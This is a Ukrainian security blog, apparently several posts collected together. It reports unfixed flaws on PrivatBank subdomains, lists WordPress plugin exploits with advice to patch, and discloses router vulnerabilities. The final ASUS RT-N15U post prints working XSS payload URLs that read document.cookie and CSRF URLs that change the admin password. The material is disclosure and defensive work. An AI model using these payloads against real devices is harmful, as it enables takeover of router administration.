Websecurity - Веб безпека

Раніше, 16.04.2013, я знайшов численні уразливості на feerverk.privatbank.ua та fireworks.privatbank.ua - це два домени одного сайта. Зокрема такі дірки як Fingerprinting та Insufficient Anti-automation. В той час вислав ці уразливості банку.

Fingerprinting (WASC-45):

http://feerverk.privatbank.ua

Витік версій серверних додатків у HTTP заголовках.

Також використання старих й уразливих версій nginx і PHP.

Insufficient Anti-automation (WASC-21):

В одній формі на сайті не було захисту від автоматизованих атак. Це дозволяло автоматизовано реєструватися на сайті. А також спамити листами і смсками.

В інший формі на сайті не було захисту від автоматизованих атак і OTP код всього два символи. Це дозволяло автоматизовано підтверджувати реєстрацію на сайті.

ПриватБанк тоді проігнорував ці уразливості. За кілька років вони були виправлені шляхом закриття сайту - любить банк так “виправляти” уразливості аби не платити винагороду. Таким чином банк кинув мене, як це було з дірками на skype.privatbank.ua та інших сайтах ПБ.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах iThemes Security, Tweet-Wheel, Echosign, Google SEO Pressor Snippet, CM Ad Changer. Для котрих з’явилися експлоіти.

• WordPress iThemes Security Insecure Backup / Logfile Generation (деталі)
• WordPress Tweet-Wheel 1.0.3.2 Cross Site Scripting (деталі)
• WordPress Echosign 1.1 Cross Site Scripting (деталі)
• WordPress Google SEO Pressor Snippet 1.2.6 XSS (деталі)
• WordPress CM Ad Changer 1.7.2 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Multiple Meta Box, Robo Gallery, leenk.me, Kento Post View Counter, Persian Woocommerce SMS. Для котрих з’явилися експлоіти.

• WordPress Multiple Meta Box 1.0 SQL Injection (деталі)
• WordPress Robo Gallery 2.0.14 Code Execution (деталі)
• WordPress leenk.me 2.5.0 Cross Site Request Forgery / Cross Site Scripting (деталі)
• WordPress Kento Post View Counter 2.8 CSRF / Cross Site Scripting (деталі)
• WordPress Persian Woocommerce SMS 3.3.2 XSS (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Music Store, Visual Form Builder, Photocart Link, Advanced Video та темі Scoreme. Для котрих з’явилися експлоіти.

• WordPress Music Store 1.0.41 Cross Site Scripting (деталі)
• WordPress Visual Form Builder 2.8.6 Cross Site Scripting (деталі)
• WordPress Photocart Link 1.6 Local File Inclusion (деталі)
• WordPress Scoreme Theme Cross Site Scripting (деталі)
• WordPress Advanced Video 1.0 Local File Inclusion (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У серпні, 28.08.2017, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в D-Link DGS-3000-10TC. Це третя частина дірок в цьому комутаторі.

Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DAP-1360 та D-Link DGS-3000-10TC.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Issuu Panel, WP External Links, Claptastic Clap! Button, CloudFlare, IMDb Profile Widget. Для котрих з’явилися експлоіти.

• WordPress Issuu Panel 1.6 Remote / Local File Inclusion (деталі)
• WordPress WP External Links 1.80 Cross Site Scripting (деталі)
• WordPress Claptastic Clap! Button 1.3 Cross Site Scripting (деталі)
• WordPress CloudFlare 1.3.20 Cross Site Scripting (деталі)
• WordPress IMDb Profile Widget 1.0.8 Local File Inclusion (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Brandfolder, Dharma Booking, Memphis Document Library, MailChimp Subscribe Forms, Facebook With Login. Для котрих з’явилися експлоіти.

• WordPress Brandfolder 3.0 Remote / Local File Inclusion (деталі)
• WordPress Dharma Booking 2.28.3 Remote / Local File Inclusion (деталі)
• WordPress Memphis Document Library 3.1.5 Arbitrary File Download (деталі)
• WordPress MailChimp Subscribe Forms 1.1 Remote Code Execution (деталі)
• WordPress Facebook With Login 1.0 Cross Site Scripting / SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Email Encoder Bundle, Bulletproof, Import CSV, eBook Download, HB Audio Gallery Lite. Для котрих з’явилися експлоіти.

• WordPress Email Encoder Bundle 1.4.3 Cross Site Scripting (деталі)
• WordPress Bulletproof 0.53.2 Cross Site Scripting (деталі)
• WordPress Import CSV 1.1 Directory Traversal (деталі)
• WordPress eBook Download 1.1 Directory Traversal (деталі)
• WordPress HB Audio Gallery Lite 1.0.0 Arbitrary File Download (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У травні, 15.05.2013, я знайшов Brute Force та Insufficient Anti-automation уразливості на сайті uniordreams.privatbank.ua. В той же день вислав ці уразливості банку.

Brute Force:

http://uniordreams.privatbank.ua/admin/

Відсутність захисту від підбору пароля адміна.

Insufficient Anti-automation:

На сторінці http://uniordreams.privatbank.ua не було захисту від автоматизованих атак. Що дозволяло спамити смсками.

Дані уразливості не були виправлені в 2013 році. ПриватБанк тоді проігнорував ці дірки, а вже в 2016 році всі вони були виправлені шляхом закриття сайту - любить банк так “виправляти” уразливості аби не платити винагороду. Відтоді на ньому працює лише редирект на інший сайт банку. Таким чином банк кинув мене, як це було з дірками на limit.privatbank.ua та інших сайтах ПБ.

30.01.2016

У листопаді, 30.11.2015, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в ASUS Wireless Router RT-N15U. Це друга частина дірок в RT-N15U.

Раніше я писав про уразливості ASUS RT-N15U.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

31.12.2017

Cross-Site Scripting (WASC-08):

http://site/apply.cgi?current_page=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
http://site/apply.cgi?next_host=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/apply.cgi?action_mode=+Save+&next_page=SaveRestart.asp&sid_list=General%3B&http_passwd=admin&v_password=admin&action=Save
http://site/apply.cgi?action_mode=Save%26Restart+&next_page=Restarting.asp&sid_list=General%3B&action=Save%26Restart

Уразливі всі версії ASUS RT-N15U. Перевірялося в прошивці v.1.9.2.7.